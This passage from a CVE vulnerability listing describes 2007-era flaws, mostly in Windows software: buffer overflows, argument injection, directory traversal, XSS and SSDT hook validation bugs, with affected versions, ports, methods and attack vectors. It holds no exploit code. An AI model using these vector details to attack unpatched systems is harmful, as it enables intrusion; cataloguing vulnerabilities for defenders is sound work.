System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks to the (1) NtCreateKey and (2) NtOpenKey Windows Native API functions. [CVE-2007-4971] ProSecurity 1.40 Beta 2 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks for Windows Native API functions including (1) NtCreateKey, (2) NtDeleteFile, (3) NtLoadDriver, (4) NtOpenSection, and (5) NtSetSystemTime. [CVE-2007-4970] ProcessGuard 3.410 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks for Windows Native API functions including (1) NtCreateFile, (2) NtCreateKey, (3) NtDeleteValueKey, (4) NtOpenFile, (5) NtOpenKey, and (6) NtSetValueKey. [CVE-2007-4969] Process Monitor 1.22 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via unspecified kernel SSDT hooks for Windows Native API functions including (1) NtCreateKey, (2) NtDeleteValueKey, (3) NtLoadKey, (4) NtOpenKey, (5) NtQueryValueKey, (6) NtSetValueKey, and (7) NtUnloadKey. [CVE-2007-4967] Online Armor Personal Firewall 2.0.1.215 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via unspecified kernel SSDT hooks for Windows Native API functions including (1) NtAllocateVirtualMemory, (2) NtConnectPort, (3) NtCreateFile, (4) NtCreateKey, (5) NtCreatePort, (6) NtDeleteFile, (7) NtDeleteValueKey, (8) NtLoadKey, (9) NtOpenFile, (10) NtOpenProcess, (11) NtOpenThread, (12) NtResumeThread, (13) NtSetContextThread, (14) NtSetValueKey, (15) NtSuspendProcess, (16) NtSuspendThread, and (17) NtTerminateThread. [CVE-2007-4931] HP System Management Homepage (SMH) for Windows, when used in conjunction with HP Version Control Agent or Version Control Repository Manager, leaves old OpenSSL software active after an OpenSSL update, which has unknown impact and attack vectors, probably related to previous vulnerabilities for OpenSSL. [CVE-2007-4916] Heap-based buffer overflow in the FileFind::FindFile method in (1) MFC42.dll, (2) MFC42u.dll, (3) MFC71.dll, and (4) MFC71u.dll in Microsoft Foundation Class (MFC) Library 8.0, as used by the ListFiles method in hpqutil.dll 2.0.0.138 in Hewlett-Packard (HP) All-in-One and Photo & Imaging Gallery 1.1 and probably other products, allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long first argument. [CVE-2007-4892] Multiple SQL injection vulnerabilities in SWSoft Plesk 7.6.1, 8.1.0, 8.1.1, and 8.2.0 for Windows allow remote attackers to execute arbitrary SQL commands via a PLESKSESSID cookie to (1) login.php3 or (2) auth.php3. [CVE-2007-4891] A certain ActiveX control in PDWizard.ocx 6.0.0.9782 and earlier in Microsoft Visual Studio 6.0 exposes dangerous (1) StartProcess, (2) SyncShell, (3) SaveAs, (4) CABDefaultURL, (5) CABFileName, and (6) CABRunFile methods, which allows remote attackers to execute arbitrary programs and have other impacts, as demonstrated using absolute pathnames in arguments to StartProcess and SyncShell. [CVE-2007-4890] Absolute directory traversal vulnerability in a certain ActiveX control in the VB To VSI Support Library (VBTOVSI.DLL) 1.0.0.0 in Microsoft Visual Studio 6.0 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveAs method. NOTE: contents can be copied from local files via the Load method. [CVE-2007-4848] Microsoft Internet Explorer 4.0 through 7 allows remote attackers to determine the existence of local files that have associated images via a res:// URI in the src property of a JavaScript Image object, as demonstrated by the URI for a bitmap image resource within a (1) .exe or (2) .dll file. [CVE-2007-4841] Mozilla Firefox before 2.0.0.8, Thunderbird before 2.0.0.8, and SeaMonkey before 1.1.5 allows remote attackers to execute arbitrary commands via a (1) mailto, (2) nntp, (3) news, or (4) snews URI with invalid "%" encoding, related to improper file type handling on Windows XP with Internet Explorer 7 installed, a variant of CVE-2007-3845. [CVE-2007-4814] Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method. [CVE-2007-4790] Stack-based buffer overflow in certain ActiveX controls in (1) FPOLE.OCX 6.0.8450.0 and (2) Foxtlib.ocx, as used in the Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library [CVE-2007-4776] Buffer overflow in Microsoft Visual Basic 6.0 and Enterprise Edition 6.0 SP6 allows user-assisted remote attackers to execute arbitrary code via a Visual Basic project (vbp) file containing a long Reference line, related to VBP_Open and OLE. NOTE: there are limited usage scenarios under which this would be a vulnerability. [CVE-2007-4698] Apple Safari 3 before Beta Update 3.0.4 on Windows, and Mac OS X 10.4 through 10.4.10, allows remote attackers to conduct cross-site scripting (XSS) attacks by causing JavaScript events to be associated with the wrong frame. [CVE-2007-4692] The tabbed browsing feature in Apple Safari 3 before Beta Update 3.0.4 on Windows, and Mac OS X 10.4 through 10.4.10, allows remote attackers to spoof HTTP authentication for other sites and possibly conduct phishing attacks by causing an authentication sheet to be displayed for a tab that is not active, which makes it appear as if it is associated with the active tab. [CVE-2007-4673] Argument injection vulnerability in Apple QuickTime 7.2 for Windows XP SP2 and Vista allows remote attackers to execute arbitrary commands via a URL in the qtnext field in a crafted QTL file. NOTE: this issue may be related to CVE-2006-4965 or CVE-2007-5045. [CVE-2007-4671] Unspecified vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to "alter or access" HTTPS content via an HTTP session with a crafted web page that causes Javascript to be applied to HTTPS pages from the same domain. [CVE-2007-4599] Stack-based buffer overflow in RealNetworks RealPlayer 10 and possibly 10.5, and RealOne Player 1 and 2, for Windows allows remote attackers to execute arbitrary code via a crafted playlist (PLS) file. [CVE-2007-4578] Sophos Anti-Virus for Windows and for Unix/Linux before 2.48.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UPX packed file, resulting from an "integer cast around". NOTE: as of 20070828, the vendor says this is a DoS and the researcher says this allows code execution, but the researcher is reliable. [CVE-2007-4516] The Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation 5.0 for Windows allows remote attackers to cause a denial of service (daemon crash or hang) via malformed packets. [CVE-2007-4512] Cross-site scripting (XSS) vulnerability in Sophos Anti-Virus for Windows 6.x before 6.5.8 and 7.x before 7.0.1 allows remote attackers to inject arbitrary web script or HTML via an archive with a file that matches a virus signature and has a crafted filename that is not properly handled by the print function in SavMain.exe. [CVE-2007-4490] Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO. [CVE-2007-4478] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6.0 and 7 allows user-assisted remote attackers to inject arbitrary web script or HTML in the local zone via a URI, when the document at the associated URL is saved to a local file, which then contains the URI string along with the document's original content. [CVE-2007-4451] The server in Toribash 2.71 and earlier on Windows allows remote attackers to cause a denial of service (continuous beep and server hang) via certain commands that contain many 0x07 or other invalid characters. [CVE-2007-4443] The UCC dedicated server for the Unreal engine, possibly 2003 and 2004, on Windows allows remote attackers to cause a denial of service (continuous beep and server slowdown) via a string containing many 0x07 characters in (1) a request to the images/ directory, (2) the Content-Type field, (3) a HEAD request, and possibly other unspecified vectors. [CVE-2007-4431] Cross-domain vulnerability in Apple Safari for Windows 3.0.3 and earlier allows remote attackers to bypass the Same Origin Policy, with access from local zones to external domains, via a certain body.innerHTML property value, aka "classic JavaScript frame hijacking." [CVE-2007-4424] Apple Safari for Windows 3.0.3 and earlier does not prompt the user before downloading a file, which allows remote attackers to download arbitrary files to the desktop of a client system via certain HTML, as demonstrated by a filename in the DATA attribute of an OBJECT element. NOTE: it could be argued that this is not a vulnerability because a dangerous file is not actually launched, but as of 2007, it is generally accepted that web browsers should prompt users before saving dangerous content. [CVE-2007-4415] Cisco VPN Client on Windows before 5.0.01.0600, and the 5.0.01.0600 InstallShield (IS) release, uses weak permissions for cvpnd.exe (Modify granted to Interactive Users), which allows local users to gain privileges via a modified cvpnd.exe. [CVE-2007-4372] Unspecified vulnerability in NetWin SurgeMail 38k on Windows Server 2003 has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-4356] Microsoft Internet Explorer 6 and 7 embeds FTP credentials in HTML files that are retrieved during an FTP session, which allows context-dependent attackers to obtain sensitive information by reading the HTML source, as demonstrated by a (1) .htm, (2) .html, or (3) .mht file. [CVE-2007-4348] Cross-site scripting (XSS) vulnerability in the CAD service in IBM Tivoli Storage Manager (TSM) Client 5.3.5.3 and 5.4.1.2 for Windows allows remote attackers to inject arbitrary web script or HTML via HTTP requests to port 1581, which generate log entries in a dsmerror.log file that is accessible through a certain web interface. [CVE-2007-4347] Multiple integer overflows in the Job Engine (bengine.exe) service in Symantec Backup Exec for Windows Servers (BEWS) 11d build 11.0.7170 and 11.0.6.6235 allow remote attackers to cause a denial of service (CPU and memory consumption) via a crafted packet to port 5633/tcp, which triggers an infinite loop. [CVE-2007-4346] The Job Engine (bengine.exe) service in Symantec Backup Exec for Windows Servers (BEWS) 11d build 11.0.7170 and 11.0.6.6235 allows remote attackers to cause a denial of service (NULL dereference and service crash) via a crafted packet to port 5633/tcp. [CVE-2007-4336] Buffer overflow in the Live Picture Corporation DXSurface.LivePicture.FlashPix.1 (DirectTransform FlashPix) ActiveX control in DXTLIPI.DLL 6.0.2.827, as packaged in Microsoft DirectX Media 6.0 SDK, allows remote attackers to execute arbitrary code via a long SourceUrl property value. [CVE-2007-4315] The AMD ATI atidsmxx.sys 3.0.502.0 driver on Windows Vista allows local users to bypass the driver signing policy, write to arbitrary kernel memory locations, and thereby gain privileges via unspecified vectors, as demonstrated by "Purple Pill". [CVE-2007-4254] Stack-based buffer overflow in a certain ActiveX control in VDT70.DLL in Microsoft Visual Database Tools Database Designer 7.0 for Microsoft Visual Studio 6 allows remote attackers to execute arbitrary code via a long argument to the NotSafe method. NOTE: this may overlap CVE-2007-2885 or CVE-2005-2127. [CVE-2007-4223] Dbgv.sys in Microsoft Sysinternals DebugView before 4.72 provides an unspecified mechanism for copying data into kernel memory, which allows local users to gain privileges via unspecified vectors. [CVE-2007-4221] Multiple buffer overflows in Motorola Timbuktu Pro before 8.6.5 for Windows allow remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via (1) a long user name and (2) certain malformed requests [CVE-2007-4220] Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. (dot dot) in a Send request, probably related to the (1) Send and (2) Exchange services. [CVE-2007-4219] Integer overflow in the RPCFN_SYNC_TASK function in StRpcSrv.dll, as used by the ServerProtect service (SpntSvc.exe), in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allows remote attackers to execute arbitrary code via a certain integer field in a request packet to TCP port 5168, which triggers a heap-based buffer overflow. [CVE-2007-4218] Multiple buffer overflows in the ServerProtect service (SpntSvc.exe) in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allow remote attackers to execute arbitrary code via certain RPC requests to certain TCP ports that are processed by the (1) RPCFN_ENG_NewManualScan, (2) RPCFN_ENG_TimedNewManualScan, and (3) RPCFN_SetComputerName functions in (a) StRpcSrv.dll [CVE-2007-4050] Unspecified vulnerability in WebUI in ADempiere Bazaar before 3.3 beta Victoria edition allows remote attackers to access system-level windows via unspecified vectors. [CVE-2007-4040] Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670. [CVE-2007-4036] DISPUTED Guidance Software EnCase allows user-assisted remote attackers to cause a denial of service via (1) a corrupted Microsoft Exchange database, which triggers an application crash when many options are selected [CVE-2007-4025] Unspecified vulnerability in Sun Java System (SJS) Application Server 8.1 through 9.0 before 20070724 on Windows allows remote attackers to obtain JSP source code via unspecified vectors. [CVE-2007-4006] Buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 has unknown impact and remote attack vectors, aka ZD-00000034. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-4005] Stack-based buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 allows remote attackers to execute arbitrary code via a long string to the shell port (514/tcp). NOTE: this might overlap CVE-2007-4006. [CVE-2007-3956] TeamSpeak WebServer 2.0 for Windows does not validate parameter value lengths and does not expire TCP sessions, which allows remote attackers to cause a denial of service (CPU and memory consumption) via long username and password parameters in a request to login.tscmd on TCP port 14534. [CVE-2007-3954] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking SeaMonkey.exe, a related issue to CVE-2007-3670. [CVE-2007-3930] Interpretation conflict between Microsoft Internet Explorer and DocuWiki before 2007-06-26b allows remote attackers to inject arbitrary JavaScript and conduct cross-site scripting (XSS) attacks when spellchecking UTF-8 encoded messages via the spell_utf8test function in lib/exe/spellcheck.php, which triggers HTML document identification and script execution by Internet Explorer even though the Content-Type header is text/plain. [CVE-2007-3924] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a -chrome argument to the navigatorurl URI, which are inserted into the command line that is created when invoking netscape.exe, a related issue to CVE-2007-3670. NOTE: there has been debate about whether the issue is in Internet Explorer or Netscape. As of 20070713, it is CVE's opinion that IE appears to not properly delimit the URL argument when invoking Netscape [CVE-2007-3903] Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via uninitialized or deleted objects used in repeated calls to the (1) cloneNode or (2) nodeValue JavaScript function, a different issue than CVE-2007-3902 and CVE-2007-5344, a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-3902] Use-after-free vulnerability in the CRecalcProperty function in mshtml.dll in Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code by calling the setExpression method and then modifying the outerHTML property of an HTML element, one variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-3901] Stack-based buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll for Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted SAMI file. [CVE-2007-3899] Unspecified vulnerability in Microsoft Word 2000 SP3, Word 2002 SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string in a Word file, aka "Word Memory Corruption Vulnerability." [CVE-2007-3895] Buffer overflow in Microsoft DirectShow in Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted (1) WAV or (2) AVI file. [CVE-2007-3893] Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via unspecified vectors involving memory corruption from an unhandled error. [CVE-2007-3892] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to spoof the URL address bar and other "trust UI" components via unspecified vectors, a different issue than CVE-2007-1091 and CVE-2007-3826. [CVE-2007-3891] Unspecified vulnerability in Windows Vista Weather Gadgets in Windows Vista allows remote attackers to execute arbitrary code via crafted HTML attributes. [CVE-2007-3890] Microsoft Excel in Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a Workspace with a certain index value that triggers memory corruption. [CVE-2007-3872] Multiple stack-based buffer overflows in the Shared Trace Service (OVTrace) service for HP OpenView Operations A.07.50 for Windows, and possibly earlier versions, allow remote attackers to execute arbitrary code via certain crafted requests. [CVE-2007-3846] Directory traversal vulnerability in Subversion before 1.4.5, as used by TortoiseSVN before 1.4.5 and possibly other products, when run on Windows-based systems, allows remote authenticated users to overwrite and create arbitrary files via a ..\ (dot dot backslash) sequence in the filename, as stored in the file repository. [CVE-2007-3815] Buffer overflow in pirs32.exe in Poslovni informator Republike Slovenije (PIRS) 2007 allows local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long search string in certain fields in the GUI. NOTE: this may cross privilege boundaries if PIRS is used by data-entry workers who do not have full access to the underlying Windows environment. [CVE-2007-3793] SQL injection vulnerability in Job Management Partner 1/NETM/DM (JP1/NETM/DM) Manager on Windows before 20070413 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2007-3760] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to inject arbitrary web script or HTML via frame tags. [CVE-2007-3758] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and in Mac OS X 10.4 through 10.4.10, allows remote attackers to set Javascript window properties for web pages that are in a different domain, which can be leveraged to conduct cross-site scripting (XSS) attacks. [CVE-2007-3756] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to obtain sensitive information via a crafted web page that identifies the URL of the parent window, even when the parent window is in a different domain. [CVE-2007-3743] Stack-based buffer overflow in bookmark handling in Apple Safari 3 Beta before Update 3.0.3 on Windows allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a bookmark with a long title. [CVE-2007-3718] Multiple unspecified vulnerabilities in the SVG parsing engine in Apple Safari 3 Beta for Windows have unspecified remote attack vectors and impact. NOTE: this issue contains no actionable information, but it was released by a reliable researcher. [CVE-2007-3678] Stack-based buffer overflow in the MSWord text-import extension (Word 6-2000 Filter.xnt) in QuarkXPress 7.2 for Windows, when using the Rectangle Text Box tool for importing text, allows user-assisted remote attackers to execute arbitrary code via a long font name. [CVE-2007-3670] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data." [CVE-2007-3658] Unspecified vulnerability in Microsoft Register Server (REGSVR) allows attackers to cause a denial of service via a crafted DLL library. [CVE-2007-3625] The Program Neighborhood Agent in Citrix Presentation Server Clients for 32-bit Windows before 10.100 allows remote attackers to cause a denial of service (agent exit) via a certain request that uses content redirection and a long pathname. [CVE-2007-3615] Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. [CVE-2007-3576] DISPUTED Microsoft Internet Explorer 6 executes web script from URIs of arbitrary scheme names ending with the "script" character sequence, using the (1) vbscript: handler for scheme names with 7 through 9 characters, and the (2) javascript: handler for scheme names with 10 or more characters, which might allow remote attackers to bypass certain XSS protection schemes. NOTE: other researchers dispute the significance of this issue, stating "this only works when typed in the address bar." [CVE-2007-3550] DISPUTED Microsoft Internet Explorer 6.0 and 7.0 allows remote attackers to fill Zones with arbitrary domains using certain metacharacters such as wildcards via JavaScript, which results in a denial of service (website suppression and resource consumption), aka "Internet Explorer Zone Domain Specification Dos and Page Suppressing". NOTE: this issue has been disputed by a third party, who states that the zone settings cannot be manipulated. [CVE-2007-3546] Cross-site scripting (XSS) vulnerability in the Windows GUI in Nessus Vulnerability Scanner before 3.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3514] Cross-domain vulnerability in Apple Safari for Windows 3.0.2 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute to a file:// location, a different vector than CVE-2007-3482. [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3504] Directory traversal vulnerability in the PersistenceService in Sun Java Web Start in JDK and JRE 5.0 Update 11 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, for Windows allows remote attackers to perform unauthorized actions via an application that grants file overwrite privileges to itself. NOTE: this can be leveraged to execute arbitrary code by overwriting a .java.policy file. [CVE-2007-3497] Microsoft Internet Explorer 7 allows remote attackers to determine the existence of page history via the history.length JavaScript variable. [CVE-2007-3490] Unspecified vulnerability in Microsoft Excel 2003 SP2 allows remote attackers to have an unknown impact via unspecified vectors, possibly related to the sheet name, as demonstrated by 2670.xls. [CVE-2007-3482] Cross-domain vulnerability in Apple Safari for Windows 3.0.1 allows remote attackers to bypass the "same origin policy" and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. [CVE-2007-3481] DISPUTED ** Cross-domain vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. NOTE: this issue has been disputed by other researchers, citing a variable scoping issue and information about the semantics of document.domain. [CVE-2007-3445] Buffer overflow in SJ Labs SJphone 1.60.303c, running under Windows Mobile 2003 on the Samsung SCH-i730 phone, allows remote attackers to cause a denial of service (device hang and call termination) via a malformed SIP INVITE message, a different vulnerability than CVE-2007-3351. [CVE-2007-3437] AOL Instant Messenger (AIM) 6.1.32.1 on Windows XP allows remote attackers to cause a denial of service (application crash) via a malformed header value in a SIP INVITE message, a different vulnerability than CVE-2007-3350. [CVE-2007-3376] Buffer overflow in Apple Safari 3.0.2 on Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long value in the title HTML tag, which triggers the overflow when the user adds the page as a bookmark. [CVE-2007-3362] ageet AGEphone before 1.6.2, running on Windows Mobile 5 on the HTC HyTN Pocket PC device, allows remote attackers to (1) cause a denial of service (call disruption and device hang) via a SIP message with a malformed header and (2) cause a denial of service (call disruption, false ring indication, and device outage) via a SIP message with a malformed SDP delimiter. [CVE-2007-3351] The SJPhone SIP soft phone 1.60.303c, when installed on the Dell Axim X3 running Windows Mobile 2003, allows remote attackers to cause a denial of service (device hang and traffic amplification) via a direct crafted INVITE transaction, which causes the phone to transmit many RTP packets. [CVE-2007-3350] AOL Instant Messenger (AIM) 6.1.32.1 on Windows XP allows remote attackers to cause a denial of service (application hang) via a flood of spoofed SIP INVITE requests. [CVE-2007-3341] Unspecified vulnerability in the FTP implementation in Microsoft Internet Explorer allows remote attackers to "see a valid memory address" via unspecified vectors, a different issue than CVE-2007-0217. [CVE-2007-3334] Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. [CVE-2007-3285] Mozilla Firefox before 2.0.0.5, when run on Windows, allows remote attackers to bypass file type checks and possibly execute programs via a (1) file:/// or (2) resource: URI with a dangerous extension, followed by a NULL byte (%00) and a safer extension, which causes Firefox to treat the requested file differently than Windows would. [CVE-2007-3284] corefoundation.dll in Apple Safari 3.0.1 (552.12.2) for Windows allows remote attackers to cause a denial of service (crash) via certain forms that trigger errors related to History, possibly involving multiple form fields with the same name. [CVE-2007-3282] Buffer overflow in the Microsoft Office MSODataSourceControl ActiveX object allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the DeleteRecordSourceIfUnused method. [CVE-2007-3274] Apple Safari 3.0 and 3.0.1 on Windows XP SP2 allows attackers to cause a denial of service (application crash) via JavaScript that sets the document.location variable, as demonstrated by an empty value of document.location. [CVE-2007-3201] Visual truncation vulnerability in Windows Privacy Tray (WinPT) 1.2.0 allows user-assisted remote attackers to install a key listed under the wrong user ID, and possibly cause the user to encrypt a victim's correspondence with this attacker-supplied key, via a key ID composed of the attacker's user ID, space characters, an invalid WinPT message, additional space characters, and the victim's user ID. [CVE-2007-3187] Multiple unspecified vulnerabilities in Apple Safari for Windows allow remote attackers to cause a denial of service or execute arbitrary code, possibly involving memory corruption, and a different issue from CVE-2007-3185 and CVE-2007-3186. NOTE: as of 20070612, the original disclosure has no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2007-3186] Apple Safari Beta 3.0.1 for Windows allows remote attackers to execute arbitrary commands via shell metacharacters in a URI in the SRC of an IFRAME, as demonstrated using a gopher URI. [CVE-2007-3185] Apple Safari Beta 3.0.1 for Windows public beta allows remote attackers to cause a denial of service (crash) via unspecified DHTML manipulations that trigger memory corruption, as demonstrated using Hamachi. [CVE-2007-3180] Buffer overflow in Help and Support Center before 4.4 C on HP Windows systems allows remote attackers to read or write arbitrary files via unknown vectors. [CVE-2007-3164] Microsoft Internet Explorer 7, when prompting for HTTP Basic Authentication for an IDN web site, uses ACE labels for the domain name in the status bar, but uses internationalized labels for this name in the authentication dialog, which might allow remote attackers to perform phishing attacks if the user misinterprets confusable characters in the internationalized labels, as demonstrated by displaying xn--theshmogroup-bgk.com only in the status bar. [CVE-2007-3153] The ares_init:randomize_key function in c-ares, on platforms other than Windows, uses a weak facility for producing a random number sequence (Unix rand), which makes it easier for remote attackers to spoof DNS responses by guessing certain values. [CVE-2007-3111] Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value. [CVE-2007-3109] The CERN Image Map Dispatcher (htimage.exe) in Microsoft FrontPage allows remote attackers to determine the existence, and possibly partial contents, of arbitrary files under the web root via a relative pathname in the PATH_INFO. [CVE-2007-3092] Microsoft Internet Explorer 6 allows remote attackers to spoof the URL bar, and page properties including SSL certificates, by interrupting page loading through certain use of location DOM objects and setTimeout calls. NOTE: this issue can be leveraged for phishing and other attacks. [CVE-2007-3091] Race condition in Microsoft Internet Explorer 6 SP1 [CVE-2007-3075] Directory traversal vulnerability in Microsoft Internet Explorer allows remote attackers to read arbitrary files via directory traversal sequences in a URI with a certain scheme, possibly related to "..%5C" (encoded backslash) sequences. [CVE-2007-3072] Directory traversal vulnerability in Mozilla Firefox before 2.0.0.4 on Windows allows remote attackers to read arbitrary files via ..%5C (dot dot encoded backslash) sequences in a resource:// URI. [CVE-2007-3062] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.2 running on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3043] Cross-site scripting (XSS) vulnerability in Collaboration - File Sharing 01-20 up to 01-20-/B and 01-30 up to 01-30-/B in Hitachi Groupmax Collaboration Portal up to 07-30-/D, Groupmax Collaboration Web Client - Forum/File Sharing up to 07-30-/C, uCosminexus Collaboration Portal up to 06-30-/D, and uCosminexus Collaboration Portal - Forum/File Sharing up to 06-30-/C on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3041] Unspecified vulnerability in the pdwizard.ocx ActiveX object for Internet Explorer 5.01, 6 SP1, and 7 allows remote attackers to execute arbitrary code via unknown vectors related to Microsoft Visual Basic 6 objects and memory corruption, aka "ActiveX Object Memory Corruption Vulnerability." [CVE-2007-3033] Cross-site scripting (XSS) vulnerability in Windows Vista Feed Headlines Gadget (aka Sidebar RSS Feeds Gadget) in Windows Vista allows user-assisted remote attackers to execute arbitrary code via an RSS feed with crafted HTML attributes, which are not properly removed and are rendered in the local zone. [CVE-2007-3032] Unspecified vulnerability in Windows Vista Contacts Gadget in Windows Vista allows user-assisted remote attackers to execute arbitrary code via crafted contact information that is not properly handled when it is imported. [CVE-2007-3030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file involving the "denoting [of] the start of a Workspace designation", which results in memory corruption, aka the "Workbook Memory Corruption Vulnerability". [CVE-2007-3029] Unspecified vulnerability in Microsoft Excel 2002 SP3 and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file containing multiple active worksheets, which results in memory corruption. [CVE-2007-3027] Race condition in Microsoft Internet Explorer 5.01, 6, and 7 allows remote attackers to execute arbitrary code by causing Internet Explorer to install multiple language packs in a way that triggers memory corruption, aka "Language Pack Installation Vulnerability." [CVE-2007-2954] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2 through SP4 for Windows allow remote attackers to execute arbitrary code via certain long arguments to the (1) RpcAddPrinterDriver, (2) RpcGetPrinterDriverDirectory, and other unspecified RPC requests, aka Novell bug 300870, a different vulnerability than CVE-2006-5854. [CVE-2007-2931] Heap-based buffer overflow in Microsoft MSN Messenger 6.2, 7.0, and 7.5, and Live Messenger 8.0 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving video conversation handling in Web Cam and video chat sessions. [CVE-2007-2927] Unspecified vulnerability in Atheros 802.11 a/b/g wireless adapter drivers before 5.3.0.35, and 6.x before 6.0.3.67, on 